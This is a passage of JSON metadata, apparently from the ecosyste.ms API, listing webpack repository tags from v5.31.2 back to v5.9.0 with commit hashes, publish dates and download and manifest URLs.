tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/